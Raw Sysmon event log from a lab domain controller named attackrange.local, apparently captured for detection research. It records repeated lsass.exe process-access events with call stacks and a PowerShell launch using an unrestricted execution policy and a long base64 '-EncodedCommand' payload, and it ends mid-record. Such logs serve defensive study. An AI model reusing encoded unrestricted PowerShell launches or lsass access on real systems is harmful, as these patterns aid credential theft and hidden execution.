13:08:40.575{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.560{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.497{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.497{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.497{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.153{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.153{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.153{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-4258-6000-CA02-000000009901}47364744C:\Windows\system32\conhost.exe{08A6967A-4259-6000-CC02-000000009901}4872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-40D2-6000-0500-000000009901}6443180C:\Windows\system32\csrss.exe{08A6967A-4259-6000-CC02-000000009901}4872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.075{08A6967A-4259-6000-CB02-000000009901}50842924C:\Windows\system32\cmd.exe{08A6967A-4259-6000-CC02-000000009901}4872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:41.079{08A6967A-4259-6000-CC02-000000009901}4872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4258-6000-5FAB-100000000000}0x10ab5f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-4259-6000-CB02-000000009901}5084C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 